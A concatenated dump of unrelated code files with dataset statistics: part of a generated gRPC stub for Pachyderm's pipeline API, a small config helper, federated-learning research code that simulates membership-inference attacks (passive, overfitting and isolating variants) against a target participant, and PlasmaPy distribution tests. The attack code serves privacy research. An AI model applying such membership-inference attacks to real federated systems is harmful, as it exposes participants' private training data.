response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'RunCron': grpc.unary_unary_rpc_method_handler(
servicer.RunCron,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RunCronRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'CreateSecret': grpc.unary_unary_rpc_method_handler(
servicer.CreateSecret,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.CreateSecretRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'DeleteSecret': grpc.unary_unary_rpc_method_handler(
servicer.DeleteSecret,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeleteSecretRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ListSecret': grpc.unary_unary_rpc_method_handler(
servicer.ListSecret,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SecretInfos.SerializeToString,
),
'InspectSecret': grpc.unary_unary_rpc_method_handler(
servicer.InspectSecret,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectSecretRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SecretInfo.SerializeToString,
),
'DeleteAll': grpc.unary_unary_rpc_method_handler(
servicer.DeleteAll,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GetLogs': grpc.unary_stream_rpc_method_handler(
servicer.GetLogs,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.GetLogsRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.LogMessage.SerializeToString,
),
'ActivateAuth': grpc.unary_unary_rpc_method_handler(
servicer.ActivateAuth,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ActivateAuthRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ActivateAuthResponse.SerializeToString,
),
'UpdateJobState': grpc.unary_unary_rpc_method_handler(
servicer.UpdateJobState,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.UpdateJobStateRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'RunLoadTestDefault': grpc.unary_unary_rpc_method_handler(
servicer.RunLoadTestDefault,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pfs_dot_pfs__pb2.RunLoadTestResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'pps_v2.API', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class API(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def InspectJob(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/InspectJob',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectJobRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InspectJobSet(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/pps_v2.API/InspectJobSet',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectJobSetRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListJob(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/pps_v2.API/ListJob',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListJobRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListJobSet(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/pps_v2.API/ListJobSet',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListJobSetRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobSetInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SubscribeJob(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/pps_v2.API/SubscribeJob',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SubscribeJobRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteJob(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/DeleteJob',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeleteJobRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StopJob(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/StopJob',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StopJobRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InspectDatum(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/InspectDatum',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectDatumRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DatumInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListDatum(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/pps_v2.API/ListDatum',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListDatumRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DatumInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RestartDatum(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/RestartDatum',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RestartDatumRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreatePipeline(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/CreatePipeline',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.CreatePipelineRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InspectPipeline(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/InspectPipeline',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectPipelineRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.PipelineInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListPipeline(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/pps_v2.API/ListPipeline',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListPipelineRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.PipelineInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeletePipeline(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/DeletePipeline',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeletePipelineRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StartPipeline(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/StartPipeline',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StartPipelineRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StopPipeline(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/StopPipeline',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StopPipelineRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RunPipeline(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/RunPipeline',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RunPipelineRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RunCron(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/RunCron',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RunCronRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateSecret(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/CreateSecret',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.CreateSecretRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteSecret(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/DeleteSecret',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeleteSecretRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListSecret(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/ListSecret',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SecretInfos.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InspectSecret(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/InspectSecret',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectSecretRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SecretInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteAll(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/DeleteAll',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetLogs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/pps_v2.API/GetLogs',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.GetLogsRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.LogMessage.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ActivateAuth(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/ActivateAuth',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ActivateAuthRequest.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ActivateAuthResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateJobState(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/UpdateJobState',
python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.UpdateJobStateRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RunLoadTestDefault(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/pps_v2.API/RunLoadTestDefault',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
python__pachyderm_dot_proto_dot_v2_dot_pfs_dot_pfs__pb2.RunLoadTestResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 50.519272
| 135
| 0.685175
| 4,796
| 47,185
| 6.260425
| 0.040033
| 0.044763
| 0.069542
| 0.088859
| 0.896053
| 0.896053
| 0.868543
| 0.834138
| 0.831241
| 0.827111
| 0
| 0.009615
| 0.248384
| 47,185
| 933
| 136
| 50.573419
| 0.836994
| 0.043213
| 0
| 0.61165
| 1
| 0
| 0.062703
| 0.024654
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067961
| false
| 0
| 0.004854
| 0.032767
| 0.109223
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9bd04d110832c6edc74b102f432b1e4249a8682
| 94
|
py
|
Python
|
src/utils.py
|
narrahmane/mlops-pipeline
|
ef1543f6012db490b8e67ddca9ee18d7e8fe6841
|
[
"MIT"
] | null | null | null |
src/utils.py
|
narrahmane/mlops-pipeline
|
ef1543f6012db490b8e67ddca9ee18d7e8fe6841
|
[
"MIT"
] | null | null | null |
src/utils.py
|
narrahmane/mlops-pipeline
|
ef1543f6012db490b8e67ddca9ee18d7e8fe6841
|
[
"MIT"
] | null | null | null |
import os
def get_bucket_url():
return os.getenv('EXSCIENTIA_ASSESMENT_BUCKET_URL', None)
| 23.5
| 61
| 0.787234
| 14
| 94
| 4.928571
| 0.785714
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117021
| 94
| 4
| 61
| 23.5
| 0.831325
| 0
| 0
| 0
| 0
| 0
| 0.326316
| 0.326316
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
6a0ae5ff033e51de83bbafb341da32e51e1480c3
| 8,971
|
py
|
Python
|
demo/utils.py
|
The-MinGo/NISL_FL
|
a18ce2b3288b50e6fdd82a0f4bd48e7a61b34159
|
[
"Apache-2.0"
] | 6
|
2022-03-04T08:30:40.000Z
|
2022-03-07T13:45:32.000Z
|
demo/utils.py
|
The-MinGo/membership-inference-attack-in-federated-learning
|
a18ce2b3288b50e6fdd82a0f4bd48e7a61b34159
|
[
"Apache-2.0"
] | null | null | null |
demo/utils.py
|
The-MinGo/membership-inference-attack-in-federated-learning
|
a18ce2b3288b50e6fdd82a0f4bd48e7a61b34159
|
[
"Apache-2.0"
] | 2
|
2021-11-10T18:13:25.000Z
|
2022-01-21T08:11:20.000Z
|
import sys
def capture_cmdline(params):
if len(sys.argv) == 1:
return params
model = sys.argv[1]
dataset = sys.argv[2]
attack_name = sys.argv[3]
params["model"] = model
params["dataset"] = dataset
params["attack_name"] = attack_name
if attack_name == "isolating_attack":
isolated_cid = params["target_participant"]["target_cid"]
params["isolated_participant"]["isolated_cid"] = isolated_cid
elif attack_name == "overfitting_attack":
params["attacker_participant"]["local_epochs"] *= 2
layer_indexes = params[model]["exploited_layer_indexes"]
params["inference_model"]["exploited_layer_indexes"] = layer_indexes
gradient_indexes = params[model]["exploited_gradient_indexes"]
params["inference_model"]["exploited_gradient_indexes"] = gradient_indexes
return params
def map_mia(attack_name, epoch, cid,
server, client, attacker,
params, logger):
if attack_name == "local_passive_attack":
local_passive_attack(epoch, cid, server,
client, attacker, params, logger)
elif attack_name == "overfitting_attack":
overfitting_attack(epoch, cid, server,
client, attacker, params, logger)
elif attack_name == "global_passive_attack":
global_passive_attack(epoch, cid, server,
client, attacker, params, logger)
elif attack_name == "isolating_attack":
isolating_attack(epoch, cid, server,
client, attacker, params, logger)
def local_passive_attack(epoch, cid, server,
client, attacker, params, logger):
target_participant_config = params["target_participant"]
target_cid = target_participant_config["target_cid"]
target_fed_epoch = target_participant_config["target_fed_epoch"]
attacker_participant_config = params["attacker_participant"]
attacker_cid = attacker_participant_config["attacker_cid"]
attacker_local_epochs = attacker_participant_config["local_epochs"]
participant_config = params["participant"]
batch_size = participant_config["batch_size"]
client_local_epochs = participant_config["local_epochs"]
if epoch == target_fed_epoch and cid == target_cid:
print("train inference model on victim (cid): {} "
"at federated learning epoch: {}".format(target_cid, (target_fed_epoch + 1)))
logger.info("train inference model on victim (cid): {}, "
"federated training epoch: {}".format(target_cid, (target_fed_epoch + 1)))
attacker.create_membership_inference_model(client)
attacker.train_inference_model()
attacker.test_inference_model(client)
print("[federated learning epoch: {}, "
"current participant(cid): {}]".format((epoch + 1), cid))
logger.info("federated training epoch: {}, "
"current participant (cid): {}".format((epoch + 1), cid))
client.download_global_parameters(server.global_parameters)
if cid == attacker_cid:
client.train_local_model(batch_size=batch_size,
local_epochs=attacker_local_epochs)
else:
client.train_local_model(batch_size=batch_size,
local_epochs=client_local_epochs)
current_local_parameters = client.upload_local_parameters()
server.accumulate_local_parameters(current_local_parameters)
def overfitting_attack(epoch, cid, server,
client, attacker, params, logger):
target_participant_config = params["target_participant"]
target_cid = target_participant_config["target_cid"]
target_fed_epoch = target_participant_config["target_fed_epoch"]
attacker_participant_config = params["attacker_participant"]
attacker_cid = attacker_participant_config["attacker_cid"]
attacker_local_epochs = attacker_participant_config["local_epochs"]
participant_config = params["participant"]
batch_size = participant_config["batch_size"]
client_local_epochs = participant_config["local_epochs"]
if epoch == target_fed_epoch and cid == target_cid:
print("train inference model on victim (cid): {} "
"at federated learning epoch: {}".format(target_cid, (target_fed_epoch + 1)))
logger.info("train inference model on victim (cid): {}, "
"federated training epoch: {}".format(target_cid, (target_fed_epoch + 1)))
attacker.create_membership_inference_model(client)
attacker.train_inference_model()
attacker.test_inference_model(client)
print("[federated learning epoch: {}, "
"current participant(cid): {}]".format((epoch + 1), cid))
logger.info("federated training epoch: {}, "
"current participant (cid): {}".format((epoch + 1), cid))
client.download_global_parameters(server.global_parameters)
if cid == attacker_cid:
client.train_local_model(batch_size=batch_size,
local_epochs=attacker_local_epochs)
else:
client.train_local_model(batch_size=batch_size,
local_epochs=client_local_epochs)
current_local_parameters = client.upload_local_parameters()
server.accumulate_local_parameters(current_local_parameters)
def global_passive_attack(epoch, cid, server,
client, attacker, params, logger):
target_participant_config = params["target_participant"]
target_cid = target_participant_config["target_cid"]
target_fed_epoch = target_participant_config["target_fed_epoch"]
attacker_participant_config = params["attacker_participant"]
attacker_cid = attacker_participant_config["attacker_cid"]
attacker_local_epochs = attacker_participant_config["local_epochs"]
participant_config = params["participant"]
batch_size = participant_config["batch_size"]
client_local_epochs = participant_config["local_epochs"]
print("[federated learning epoch: {}, current participant (cid): {}]".format((epoch + 1), cid))
logger.info("federated training epoch: {}, "
"current participant (cid): {}".format((epoch + 1), cid))
client.download_global_parameters(server.global_parameters)
if cid == attacker_cid:
client.train_local_model(batch_size=batch_size, local_epochs=attacker_local_epochs)
else:
client.train_local_model(batch_size=batch_size, local_epochs=client_local_epochs)
current_local_parameters = client.upload_local_parameters()
server.accumulate_local_parameters(current_local_parameters)
if epoch == target_fed_epoch and cid == target_cid:
print("train inference model on victim (cid): {} "
"at federated learning epoch: {}".format(target_cid, (target_fed_epoch + 1)))
logger.info("train inference model on victim (cid): {}, "
"federated training epoch: {}".format(target_cid, (target_fed_epoch + 1)))
attacker.create_membership_inference_model(client)
attacker.train_inference_model()
attacker.test_inference_model(client)
def isolating_attack(epoch, cid, server,
client, attacker, params, logger):
target_participant_config = params["target_participant"]
target_cid = target_participant_config["target_cid"]
target_fed_epoch = target_participant_config["target_fed_epoch"]
attacker_participant_config = params["attacker_participant"]
attacker_cid = attacker_participant_config["attacker_cid"]
attacker_local_epochs = attacker_participant_config["local_epochs"]
participant_config = params["participant"]
batch_size = participant_config["batch_size"]
client_local_epochs = participant_config["local_epochs"]
print("[federated learning epoch: {}, current participant (cid): {}]".format((epoch + 1), cid))
logger.info("federated training epoch: {}, "
"current participant (cid): {}".format((epoch + 1), cid))
client.download_global_parameters(server.global_parameters)
if cid == attacker_cid:
client.train_local_model(batch_size=batch_size, local_epochs=attacker_local_epochs)
else:
client.train_local_model(batch_size=batch_size, local_epochs=client_local_epochs)
current_local_parameters = client.upload_local_parameters()
server.accumulate_local_parameters(current_local_parameters)
if epoch == target_fed_epoch and cid == target_cid:
print("train inference model on victim (cid): {} "
"at federated learning epoch: {}".format(target_cid, (target_fed_epoch + 1)))
logger.info("train inference model on victim (cid): {}, "
"federated training epoch: {}".format(target_cid, (target_fed_epoch + 1)))
attacker.create_membership_inference_model(client)
attacker.train_inference_model()
attacker.test_inference_model(client)
| 43.760976
| 99
| 0.694906
| 993
| 8,971
| 5.92145
| 0.064451
| 0.104082
| 0.047619
| 0.036735
| 0.911224
| 0.885374
| 0.885374
| 0.878571
| 0.878571
| 0.863946
| 0
| 0.00294
| 0.203879
| 8,971
| 204
| 100
| 43.97549
| 0.820358
| 0
| 0
| 0.802548
| 0
| 0
| 0.210679
| 0.013265
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038217
| false
| 0.038217
| 0.006369
| 0
| 0.057325
| 0.050955
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a2282b871273300c11b9705b7491f72e61d4be8
| 46,585
|
py
|
Python
|
plasmapy/formulary/tests/test_distribution.py
|
sandshrew118/PlasmaPy
|
6053bd4f6ca36491b9d03fd1ab203f2fcb1bf33d
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | null | null | null |
plasmapy/formulary/tests/test_distribution.py
|
sandshrew118/PlasmaPy
|
6053bd4f6ca36491b9d03fd1ab203f2fcb1bf33d
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 8
|
2018-08-15T06:38:32.000Z
|
2021-12-17T07:11:05.000Z
|
plasmapy/formulary/tests/test_distribution.py
|
sandshrew118/PlasmaPy
|
6053bd4f6ca36491b9d03fd1ab203f2fcb1bf33d
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 3
|
2017-07-19T07:28:21.000Z
|
2020-06-24T18:34:07.000Z
|
"""Tests for functions that uses Distribution functions."""
import numpy as np
import pytest
import scipy.integrate as spint
from astropy import units as u
from astropy.constants import c, e, eps0, k_B, m_e, m_p, mu0
from ..distribution import (
kappa_velocity_1D,
kappa_velocity_3D,
Maxwellian_1D,
Maxwellian_speed_1D,
Maxwellian_speed_2D,
Maxwellian_speed_3D,
Maxwellian_velocity_2D,
Maxwellian_velocity_3D,
)
from ..parameters import kappa_thermal_speed, thermal_speed
class Test_Maxwellian_1D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T_e = 30000 * u.K
self.v = 1e5 * u.m / u.s
self.v_drift = 1000000 * u.m / u.s
self.v_drift2 = 0 * u.m / u.s
self.v_drift3 = 1e5 * u.m / u.s
self.start = -5000
self.stop = -self.start
self.dv = 10000 * u.m / u.s
self.v_vect = np.arange(self.start, self.stop, dtype="float64") * self.dv
self.particle = "e"
self.vTh = thermal_speed(
self.T_e, particle=self.particle, method="most_probable"
)
self.distFuncTrue = 5.851627151617136e-07
def test_max_noDrift(self):
"""
Checks maximum value of distribution function is in expected place,
when there is no drift applied.
"""
max_index = Maxwellian_1D(
self.v_vect, T=self.T_e, particle=self.particle, v_drift=0 * u.m / u.s
).argmax()
assert np.isclose(self.v_vect[max_index].value, 0.0)
def test_max_drift(self):
"""
Checks maximum value of distribution function is in expected place,
when there is drift applied.
"""
max_index = Maxwellian_1D(
self.v_vect, T=self.T_e, particle=self.particle, v_drift=self.v_drift
).argmax()
assert np.isclose(self.v_vect[max_index].value, self.v_drift.value)
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# converting vTh to unitless
vTh = self.vTh.si.value
# setting up integration from -10*vTh to 10*vTh, which is close to Inf
infApprox = 10 * vTh
# integrating, this should be close to 1
integ = spint.quad(
Maxwellian_1D,
-infApprox,
infApprox,
args=(self.T_e, self.particle, 0, vTh, "unitless"),
epsabs=1e0,
epsrel=1e0,
)
# value returned from quad is (integral, error), we just need
# the 1st
integVal = integ[0]
exceptStr = "Integral of distribution function should be 1 and not {integVal}."
assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr
def test_std(self):
"""
Tests standard deviation of function?
"""
std = (
Maxwellian_1D(self.v_vect, T=self.T_e, particle=self.particle)
* self.v_vect ** 2
* self.dv
).sum()
std = np.sqrt(std)
